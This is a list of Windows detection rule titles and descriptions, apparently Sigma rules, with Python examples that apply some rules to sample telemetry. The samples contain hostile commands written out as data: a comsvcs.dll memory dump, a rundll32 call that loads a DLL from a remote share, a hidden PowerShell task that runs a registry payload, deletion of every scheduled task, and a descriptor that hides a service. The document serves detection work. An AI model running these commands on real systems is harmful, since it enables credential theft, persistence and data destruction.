Rundll32 UNC Path Execution Detects rundll32 execution where the DLL is located on a remote location (share) https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code
Suspicious Workstation Locking via Rundll32 Detects a suspicious call to the user32.dll function that locks the user workstation https://app.any.run/tasks/2aef9c63-f944-4763-b3ef-81eee209d128/
Suspicious Modification Of Scheduled Tasks Detects an attempt to modify an already existing scheduled task so that it runs from a suspicious location. Attackers can create an innocuous-looking task to avoid detection at creation time, which is where monitoring is usually focused, and then modify the task afterwards to include their malicious payload. Internal Research, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks
Suspicious WebDav Client Execution Via Rundll32.EXE Detects "svchost.exe" spawning "rundll32.exe" with command arguments like C:\windows\system32\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397 https://twitter.com/aceresponder/status/1636116096506818562, https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/, https://www.pwndefend.com/2023/03/15/the-long-game-persistent-hash-theft/, https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2023/03/Figure-7-sample-webdav-process-create-event.png, https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/
WebDav Client Execution Via Rundll32.EXE Detects "svchost.exe" spawning "rundll32.exe" with command arguments like "C:\windows\system32\davclnt.dll,DavSetCookie". This could be an indicator of exfiltration or use of WebDav to launch code (hosted on a WebDav server). https://github.com/OTRF/detection-hackathon-apt29/issues/17, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/7.B.4_C10730EA-6345-4934-AA0F-B0EFCA0C4BA6.md
Rundll32 Execution Without Parameters Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module https://bczyz1.github.io/2021/01/30/psexec.html
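The rundll32 rules above mostly reduce to substring checks on the process-creation command line, but several of them (comsvcs.dll MiniDump via ordinal, ShellExec_RunDLL via ordinal, DLLs in an ADS or on a UNC path, rundll32 with no arguments) only hold up if the command line is normalized first, because rundll32 tolerates spacing around the comma and signed or wrapped ordinals. The following Python is an added example, not SigmaTACT or SigmaHQ code: it applies a narrowed form of six of those rules to constructed Sysmon Event ID 1 records. The record layout, rule predicates, the 32-bit ordinal wrap and the ShellExec_RunDLL ordinal (61, taken from the xcyclopedia reference above) are this example's assumptions.

```python
"""Added example (not SigmaHQ code): apply a few of the rundll32 detections
listed above to constructed Sysmon Event ID 1 (process creation) records.
The records, rule predicates and helpers are this example's own, and the
matching is deliberately narrower than the real Sigma rules."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    image: str         # Image: full path of the created process
    parent_image: str  # ParentImage
    command_line: str  # CommandLine, exactly as logged


def _fold_ordinal(m: re.Match) -> str:
    # rundll32 reads the ordinal as a 32-bit integer, so '#+24' and
    # '#-4294967272' both mean '#24' (signed forms per the Hexacorn
    # reference above; the 32-bit wrap is this example's assumption).
    return f"#{int(m.group(1)) % 2**32}"


def normalize(cmd: str) -> str:
    """Lower-case, collapse whitespace, drop spaces around ',' and fold
    obfuscated ordinals so the rules below can use plain substrings."""
    s = " ".join(cmd.lower().split())
    s = re.sub(r"\s*,\s*", ",", s)
    return re.sub(r"#([+-]?\d+)", _fold_ordinal, s)


def _is_rundll32(ev: ProcEvent) -> bool:
    return ev.image.lower().endswith("\\rundll32.exe")


# rule name -> predicate over (event, normalized command line)
RULES = {
    "Process Memory Dump Via Comsvcs.DLL":
        lambda ev, c: "comsvcs.dll" in c and ("minidump" in c or "#24" in c),
    # ShellExec_RunDLL is exported by shell32.dll at ordinal 61 (assumed).
    "Suspicious ShellExec_RunDLL Call Via Ordinal":
        lambda ev, c: "shell32.dll" in c and ",#61" in c,
    "Suspicious Usage Of ShellExec_RunDLL":
        lambda ev, c: "shellexec_rundll" in c,
    # a DLL argument of the form <drive>:\...\file.ext:streamname
    "Potential Rundll32 Execution With DLL Stored In ADS":
        lambda ev, c: re.search(r"\b[a-z]:\\[^\s,]*:[^\s,\\]+", c) is not None,
    # DLL argument starting with \\server\share
    "Rundll32 UNC Path Execution":
        lambda ev, c: re.search(r"\s\\\\[^\\\s]+\\", c) is not None,
    "Suspicious Workstation Locking via Rundll32":
        lambda ev, c: "user32.dll,lockworkstation" in c,
    # nothing but the (optionally quoted, optionally full-path) binary
    "Rundll32 Execution Without CommandLine Parameters":
        lambda ev, c: re.fullmatch(r'"?(?:[a-z]:\\[^"\s]*\\)?rundll32(?:\.exe)?"?', c) is not None,
}


def evaluate(events) -> list:
    """Return (rule name, original command line) for every rule each event trips."""
    hits = []
    for ev in events:
        if not _is_rundll32(ev):
            continue
        c = normalize(ev.command_line)
        for name, pred in RULES.items():
            if pred(ev, c):
                hits.append((name, ev.command_line))
    return hits


# Constructed sample telemetry (not captured from a real host).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\rundll32.exe", r"C:\Windows\System32\cmd.exe",
              r"rundll32.exe C:\Windows\System32\comsvcs.dll , #-4294967272 652 C:\Temp\l.dmp full"),
    ProcEvent(r"C:\Windows\System32\rundll32.exe", r"C:\Windows\explorer.exe",
              r'rundll32 SHELL32.DLL,#61 "cmd /c calc.exe"'),
    ProcEvent(r"C:\Windows\System32\rundll32.exe", r"C:\Windows\System32\cmd.exe",
              r"rundll32.exe C:\Users\Public\notes.txt:payload.dll,DllMain"),
    ProcEvent(r"C:\Windows\System32\rundll32.exe", r"C:\Windows\System32\cmd.exe",
              r"rundll32.exe \\10.0.0.5\share\evil.dll,Start"),
    ProcEvent(r"C:\Windows\System32\rundll32.exe", r"C:\Windows\explorer.exe",
              r'"C:\Windows\System32\rundll32.exe"'),
    # benign: an ordinary Control Panel launch through shell32
    ProcEvent(r"C:\Windows\System32\rundll32.exe", r"C:\Windows\explorer.exe",
              r'"C:\Windows\System32\rundll32.exe" C:\Windows\System32\shell32.dll,Control_RunDLL desk.cpl'),
    # not rundll32 at all: ignored regardless of its arguments
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe",
              r"cmd.exe /c rundll32 comsvcs.dll,MiniDump"),
]

if __name__ == "__main__":
    for rule, cmd in evaluate(SAMPLE_EVENTS):
        print(f"[{rule}] {cmd}")
```

The point of `normalize` is that a rule keyed on the literal string `#24` misses `#+24` and the wrapped negative form, while a rule keyed on `MiniDump` misses every ordinal form; folding first lets one predicate cover all of them. In production the same normalization belongs in the SIEM pipeline rather than in each rule.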
Run Once Task Execution as Configured in Registry This rule detects the execution of Run Once task as configured in the registry https://twitter.com/pabraeken/status/990717080805789697, https://lolbas-project.github.io/lolbas/Binaries/Runonce/, https://twitter.com/0gtweet/status/1602644163824156672?s=20&t=kuxbUnZPltpvFPZdCrqPXA
Suspicious Schtasks Execution AppData Folder Detects the creation of a schtask that executes a file from C:\Users\\AppData\Local https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/
Scheduled Task Creation Via Schtasks.EXE Detects the creation of scheduled tasks by user accounts via the "schtasks" utility. https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create
Suspicious Scheduled Task Creation Involving Temp Folder Detects the creation of scheduled tasks that involves a temporary folder and runs only once https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3
Delete Important Scheduled Task Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities Internal Research
Delete All Scheduled Tasks Detects the usage of schtasks with the delete flag and the asterisk symbol to delete all tasks from the schedule of the local computer, including tasks scheduled by other users. https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-delete
Disable Important Scheduled Task Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-8---windows---disable-the-sr-scheduled-task, https://twitter.com/MichalKoczwara/status/1553634816016498688, https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/
Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/, https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04, https://blog.talosintelligence.com/gophish-powerrat-dcrat/
Schtasks From Suspicious Folders Detects scheduled task creations that have suspicious action command and folder combinations https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-dream-job-chemical
Suspicious Scheduled Task Name As GUID Detects creation of a scheduled task with a GUID like name https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/, https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/
Uncommon One Time Only Scheduled Task At 00:00 Detects scheduled task creation events that include suspicious actions, and is run once at 00:00 https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte
Potential Persistence Via Microsoft Compatibility Appraiser Detects manual execution of the "Microsoft Compatibility Appraiser" task via schtasks in order to trigger persistence stored in the "\AppCompatFlags\TelemetryController" registry key. https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/
Potential Persistence Via Powershell Search Order Hijacking - Task Detects suspicious PowerShell execution via a scheduled task where the command ends with flags that hide the PowerShell window instead of executing scripts or commands. This could be a sign of persistence via the PowerShell "Get-Variable" technique as used by Colibri Loader https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/
Scheduled Task Executing Payload from Registry Detects the creation of a schtasks that potentially executes a payload stored in the Windows Registry using PowerShell. https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/
Scheduled Task Executing Encoded Payload from Registry Detects the creation of a schtask that potentially executes a base64 encoded payload stored in the Windows Registry using PowerShell. https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/
Suspicious Schtasks Schedule Types Detects scheduled task creations or modification on a suspicious schedule type https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create, http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html
Suspicious Schtasks Schedule Type With High Privileges Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create
Suspicious Scheduled Task Creation via Masqueraded XML File Detects the creation of a scheduled task using the "-XML" flag with a file that lacks the '.xml' extension. This behavior could indicate a defense evasion attempt during persistence https://learn.microsoft.com/en-us/windows/win32/taskschd/daily-trigger-example--xml-, https://github.com/elastic/protections-artifacts/blob/084067123d3328a823b1c3fdde305b694275c794/behavior/rules/persistence_suspicious_scheduled_task_creation_via_masqueraded_xml_file.toml
Suspicious Command Patterns In Scheduled Task Creation Detects scheduled task creation using "schtasks" that contain potentially suspicious or uncommon commands https://app.any.run/tasks/512c1352-6380-4436-b27d-bb62f0c020d6/, https://twitter.com/RedDrip7/status/1506480588827467785, https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf
Schtasks Creation Or Modification With SYSTEM Privileges Detects the creation or update of a scheduled task to run with "NT AUTHORITY\SYSTEM" privileges https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks
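The schtasks rules above all key on combinations of the same few arguments (/tn, /tr, /sc, /st, /ru, /xml) plus the verb, so they are easiest to reason about once the command line is parsed into fields rather than searched as one string. The Python below is an added example, not SigmaTACT or SigmaHQ code: it tokenizes a schtasks command line and applies checks in the spirit of the rules above (suspicious action path or environment variable, GUID task name, one-time task at 00:00, SYSTEM with an uncommon trigger, PowerShell payload read from the registry, XML import without a .xml extension, and deleting every task). The path lists, the set of "uncommon" schedule types, the finding wording and the sample command lines are this example's assumptions, not the rules' exact logic.

```python
"""Added example (not SigmaHQ code): parse a schtasks.exe command line and
apply the kinds of checks the scheduled-task rules above describe. Path
lists, schedule types treated as uncommon and the sample command lines
are this example's own assumptions."""
import re

# user-writable locations and env variables malware commonly schedules from
SUSPICIOUS_PATHS = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")
SUSPICIOUS_ENV = ("%appdata%", "%localappdata%", "%temp%", "%tmp%", "%public%", "%programdata%")
# trigger types rarely used by legitimately created tasks (assumed set)
UNCOMMON_SC = {"ONLOGON", "ONSTART", "ONCE", "ONIDLE"}
SYSTEM_ACCOUNTS = {"system", "nt authority\\system"}
GUID_RE = re.compile(r"^\{?[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\}?$", re.I)
VERBS = {"/create", "/change", "/delete", "/run", "/end", "/query"}
VALUE_FLAGS = {"/tn", "/tr", "/sc", "/ru", "/st", "/xml"}


def parse_schtasks(cmd: str) -> dict:
    """Tokenize a Windows command line (double-quoted strings stay whole)
    and collect the verb plus the value-taking flags we care about."""
    toks = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmd)]
    args = {"verb": None}
    i = 0
    while i < len(toks):
        t = toks[i].lower()
        if t in VERBS:
            args["verb"] = t[1:]
        elif t in VALUE_FLAGS and i + 1 < len(toks):
            args[t[1:]] = toks[i + 1]
            i += 1
        i += 1
    return args


def assess_schtasks(cmd: str) -> list:
    """Return human-readable findings for one schtasks command line."""
    a = parse_schtasks(cmd)
    if a["verb"] == "delete" and a.get("tn") == "*":
        return ["deletes every scheduled task on the host"]
    if a["verb"] not in ("create", "change"):
        return []
    tr = a.get("tr", "").lower()
    sc = a.get("sc", "").upper()
    ru = a.get("ru", "").lower()
    leaf = a.get("tn", "").rstrip("\\").rsplit("\\", 1)[-1]   # last path component

    findings = []
    if any(p in tr for p in SUSPICIOUS_PATHS) or any(e in tr for e in SUSPICIOUS_ENV):
        findings.append("action runs from a user-writable or env-variable path")
    if GUID_RE.match(leaf):
        findings.append("task name is a GUID")
    if sc == "ONCE" and a.get("st") == "00:00":
        findings.append("one-time task scheduled at 00:00")
    if ru in SYSTEM_ACCOUNTS:
        trigger = f" with {sc} trigger" if sc in UNCOMMON_SC else ""
        findings.append(f"runs as SYSTEM{trigger}")
    if "powershell" in tr and re.search(r"hk(lm|cu):|registry::", tr):
        kind = "base64-encoded " if "frombase64string" in tr else ""
        findings.append(f"PowerShell action reads a {kind}payload from the registry")
    if "xml" in a and not a["xml"].lower().endswith(".xml"):
        findings.append("task imported from a file without .xml extension")
    return findings


# Constructed command lines (not captured from a real host).
SAMPLE_COMMANDS = [
    r'schtasks /create /tn "\Microsoft\Windows\{2f3a1b9c-6d4e-4a1b-9c2d-0e5f6a7b8c9d}" '
    r'/tr "C:\Users\bob\AppData\Local\Temp\update.exe" /sc ONCE /st 00:00 /ru SYSTEM /f',
    r'''schtasks /create /tn Updater /tr "powershell -w hidden -c iex((gp 'HKCU:\Software\Foo').bar)" /sc ONLOGON''',
    r'schtasks /change /tn "\Microsoft\Windows\Defrag\ScheduledDefrag" /tr "C:\ProgramData\svc.exe"',
    r"schtasks /create /tn Import /xml C:\Users\Public\task.txt",
    r'schtasks /create /tn Backup /tr "C:\Program Files\Backup\backup.exe" /sc DAILY /st 02:00',
    r"schtasks /query /tn Backup",
    r"schtasks /delete /tn * /f",
]


def assess_all() -> dict:
    return {cmd: assess_schtasks(cmd) for cmd in SAMPLE_COMMANDS}


if __name__ == "__main__":
    for cmd, findings in assess_all().items():
        print(cmd, "->", findings or "clean")
```

The third sample shows why the "modification" rule above exists: the `/change` verb leaves the task name untouched and only swaps the action, so a rule that fires solely on `/create` never sees it.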
Script Event Consumer Spawning Process Detects a suspicious child process of Script Event Consumer (scrcons.exe). https://redcanary.com/blog/child-processes/, https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-analytics-alert-reference/cortex-xdr-analytics-alert-reference/scrcons-exe-rare-child-process.html
Possible Privilege Escalation via Weak Service Permissions Detects sc.exe launched by a user at Medium integrity level to change a service's ImagePath or FailureCommand https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment, https://pentestlab.blog/2017/03/30/weak-service-permissions/
New Service Creation Using Sc.EXE Detects the creation of a new service using the "sc.exe" utility. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md
Service StartupType Change Via Sc.EXE Detects the use of "sc.exe" to change the startup type of a service to "disabled" or "demand" https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955
New Kernel Driver Via SC.EXE Detects creation of a new service (kernel driver) with the type "kernel" https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/
Interesting Service Enumeration Via Sc.EXE Detects the enumeration and query of interesting and in some cases sensitive services on the system via "sc.exe". Attackers often try to enumerate the services currently running on a system in order to find different attack vectors. https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/, https://pentestlab.blog/tag/svchost/
Allow Service Access Using Security Descriptor Tampering Via Sc.EXE Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs. https://twitter.com/0gtweet/status/1628720819537936386, https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/, https://learn.microsoft.com/en-us/windows/win32/secauthz/sid-strings
Deny Service Access Using Security Descriptor Tampering Via Sc.EXE Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable. https://www.sans.org/blog/red-team-tactics-hiding-windows-services/, https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/, https://learn.microsoft.com/en-us/windows/win32/secauthz/sid-strings
Service DACL Abuse To Hide Services Via Sc.EXE Detects usage of the "sc.exe" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable. https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html, https://www.sans.org/blog/red-team-tactics-hiding-windows-services/, https://twitter.com/Alh4zr3d/status/1580925761996828672, https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/
Service Security Descriptor Tampering Via Sc.EXE Detects sc.exe setting a security descriptor on a service with special permissions that hide that service. https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html, https://www.sans.org/blog/red-team-tactics-hiding-windows-services/, https://twitter.com/Alh4zr3d/status/1580925761996828672, https://twitter.com/0gtweet/status/1628720819537936386, https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/
Suspicious Service Path Modification Detects service path modification via the "sc" binary to a suspicious command or path https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md, https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html
Potential Persistence Attempt Via Existing Service Tampering Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence. https://pentestlab.blog/2020/01/22/persistence-modify-existing-service/
Stop Windows Service Via Sc.EXE Detects the stopping of a Windows service via the "sc.exe" utility https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc742107(v=ws.11)
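The four security-descriptor rules above all inspect the SDDL string passed to `sc.exe sdset`, and the interesting cases are structural: a deny ACE that strips list/write/delete rights from administrators or interactive and service logons (the "hidden, unremovable service" trick), or an allow ACE that hands control rights to a broad trustee such as Everyone or Authenticated Users. The Python below is an added example, not SigmaTACT or SigmaHQ code: it decodes the DACL portion of the SDDL into ACEs and flags those two patterns. Right and trustee abbreviations follow the SDDL syntax reference linked above; which trustees count as "critical" or "broad", which rights count as "control", and the sample command lines are this example's own assumptions.

```python
"""Added example (not SigmaHQ code): decode the SDDL string handed to
'sc.exe sdset' and flag the service-DACL tampering patterns the rules
above describe. Rights/trustee codes follow the SDDL reference above;
the trustee and rights groupings are this example's assumptions."""
import re

ACE_RE = re.compile(r"\(([^)]*)\)")
# D:<flags>(ace)(ace)... up to the next component (e.g. S: for the SACL)
DACL_RE = re.compile(r"D:[A-Z]*((?:\([^)]*\))+)")

# Denying these to admins / interactive / service logons hides the service
# from 'sc query' and services.msc and blocks deletion (SANS reference above).
HIDE_RIGHTS = {"DC", "LC", "WP", "DT", "SD"}
CRITICAL_TRUSTEES = {"BA", "SY", "IU", "SU", "LA"}     # admins, SYSTEM, interactive, service, local admin
BROAD_TRUSTEES = {"WD", "AU", "AN", "BU", "BG", "LG"}  # Everyone, Auth. users, Anonymous, Users, Guests
# rights that let a trustee reconfigure, stop/delete or re-ACL the service
CONTROL_RIGHTS = {"WP", "DT", "SD", "WD", "WO", "GA", "GW"}


def parse_dacl(sddl: str) -> list:
    """Return the DACL ACEs as dicts: type, rights (set of 2-letter codes), trustee."""
    m = DACL_RE.search(sddl)
    if not m:
        return []
    aces = []
    for body in ACE_RE.findall(m.group(1)):
        fields = body.split(";")
        if len(fields) < 6:
            continue  # malformed ACE; a production parser should reject the whole string
        ace_type, _flags, rights, _obj, _inherit_obj, trustee = fields[:6]
        # rights may be a hex mask instead of concatenated codes; keep it opaque then
        rights_set = {rights} if rights.startswith("0x") else set(re.findall(r"[A-Z]{2}", rights))
        aces.append({"type": ace_type, "rights": rights_set, "trustee": trustee})
    return aces


def assess_dacl(sddl: str) -> list:
    """Findings for deny-on-critical-trustee and allow-to-broad-trustee ACEs."""
    findings = []
    for ace in parse_dacl(sddl):
        t, r, who = ace["type"], ace["rights"], ace["trustee"]
        if t == "D" and who in CRITICAL_TRUSTEES:
            if HIDE_RIGHTS <= r:
                findings.append(f"deny {''.join(sorted(HIDE_RIGHTS))} to {who}: hides service / blocks removal")
            else:
                findings.append(f"deny ACE on critical trustee {who}: {''.join(sorted(r))}")
        elif t == "A" and who in BROAD_TRUSTEES and r & CONTROL_RIGHTS:
            findings.append(f"allow {who} control rights {''.join(sorted(r & CONTROL_RIGHTS))}")
    return findings


def assess_sc_sdset(cmdline: str):
    """(service name, findings) for an 'sc sdset' command line; (None, []) otherwise."""
    m = re.search(r"\bsdset\s+(\S+)\s+(\S+)", cmdline, re.I)
    if not m:
        return None, []
    return m.group(1), assess_dacl(m.group(2))


# Constructed command lines (not captured from a real host).
SAMPLES = {
    # the hide-a-service descriptor: deny DCLCWPDTSD to IU, SU and BA
    "hide": "sc.exe sdset backupsvc D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)"
            "(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)"
            "(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)",
    # weak service permissions: Authenticated Users may reconfigure and stop the service
    "weak": "sc sdset vulnsvc D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
            "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;AU)",
    # a typical default service descriptor
    "default": "sc sdset okaysvc D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
               "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)",
    "query": "sc query type= service",
}

if __name__ == "__main__":
    for label, cmd in SAMPLES.items():
        print(label, assess_sc_sdset(cmd))
```

Matching on the literal substring `DCLCWPDTSD`, as a command-line rule must, catches the published technique but not a reordered rights string; parsing the ACE into a set, as above, does not care about order, which is why the parsed form is preferable when the SIEM can afford it.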
Potential Shim Database Persistence via Sdbinst.EXE Detects installation of a new shim using sdbinst.exe. Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims https://www.mandiant.com/resources/blog/fin7-shim-databases-persistence
Uncommon Extension Shim Database Installation Via Sdbinst.EXE Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe. Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html, https://github.com/nasbench/Misc-Research/blob/8ee690e43a379cbce8c9d61107442c36bd9be3d3/Other/Undocumented-Flags-Sdbinst.md
Sdclt Child Processes A general detection for sdclt spawning new processes. This could be an indicator of sdclt being used in UAC bypass techniques. https://github.com/OTRF/detection-hackathon-apt29/issues/6, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md
Sdiagnhost Calling Suspicious Child Process Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190) https://twitter.com/nao_sec/status/1530196847679401984, https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/, https://app.any.run/tasks/f420d295-0457-4e9b-9b9e-6732be227583/, https://app.any.run/tasks/c4117d9a-f463-461a-b90f-4cd258746798/
Potential Suspicious Activity Using SeCEdit Detects potentially suspicious behaviour using secedit.exe, such as exporting or modifying the security policy https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/secedit
Suspicious Serv-U Process Pattern Detects a suspicious process pattern which could be a sign of an exploited Serv-U service https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/
Uncommon Child Process Of Setres.EXE Detects uncommon child process of Setres.EXE. Setres.EXE is a Windows server only process and tool that can be used to set the screen resolution. It can potentially be abused in order to launch any arbitrary file with a name containing the word "choice" from the current execution path. https://lolbas-project.github.io/lolbas/Binaries/Setres/, https://twitter.com/0gtweet/status/1583356502340870144, https://strontic.github.io/xcyclopedia/library/setres.exe-0E30E4C09637D7A128A37B59A3BC4D09.html, https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)
Potential SPN Enumeration Via Setspn.EXE Detects service principal name (SPN) enumeration used for Kerberoasting https://web.archive.org/web/20200329173843/https://p16.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation, https://www.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation/?edition=2019
Setup16.EXE Execution With Custom .Lst File Detects the execution of "Setup16.EXE", an old installation utility, with a custom ".lst" file. These ".lst" files can contain references to external programs that "Setup16.EXE" will execute. Attackers and adversaries might leverage this as a living-off-the-land utility. https://www.hexacorn.com/blog/2024/10/12/the-sweet16-the-oldbin-lolbin-called-setup16-exe/
Suspicious Execution of Shutdown Detects use of the command line to shut down or reboot Windows https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown
Suspicious Execution of Shutdown to Log Out Detects the rare use of the command line tool shutdown to logoff a user https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1529/T1529.md, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown
Uncommon Sigverif.EXE Child Process Detects uncommon child processes spawning from "sigverif.exe", which could indicate abuse of the latter as a living-off-the-land binary to proxy execution. https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/, https://twitter.com/0gtweet/status/1457676633809330184
Uncommon Child Processes Of SndVol.exe Detects potentially uncommon child processes of SndVol.exe (the Windows volume mixer) https://twitter.com/Max_Mal_/status/1661322732456353792
Audio Capture via SoundRecorder Detects an attacker collecting audio via the SoundRecorder application. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md, https://eqllib.readthedocs.io/en/latest/analytics/f72a98cb-7b3d-4100-99c3-a138b6e9ff6e.html
Suspicious Splwow64 Without Params Detects suspicious Splwow64.exe process without any command line parameters https://twitter.com/sbousseaden/status/1429401053229891590?s=12
Suspicious Spool Service Child Process Detects suspicious print spool service (spoolsv.exe) child processes. https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/efa17a600b43c897b4b7463cc8541daa1987eeb4/Exploits/Print%20Spooler%20RCE/Suspicious%20Spoolsv%20Child%20Process.md
Veeam Backup Database Suspicious Query Detects potentially suspicious SQL queries using SQLCmd targeting the Veeam backup databases in order to steal information. https://labs.withsecure.com/publications/fin7-target-veeam-servers
VeeamBackup Database Credentials Dump Via Sqlcmd.EXE Detects a dump of credentials from the VeeamBackup database (dbo schema) https://thedfirreport.com/2021/12/13/diavol-ransomware/, https://forums.veeam.com/veeam-backup-replication-f2/recover-esxi-password-in-veeam-t34630.html
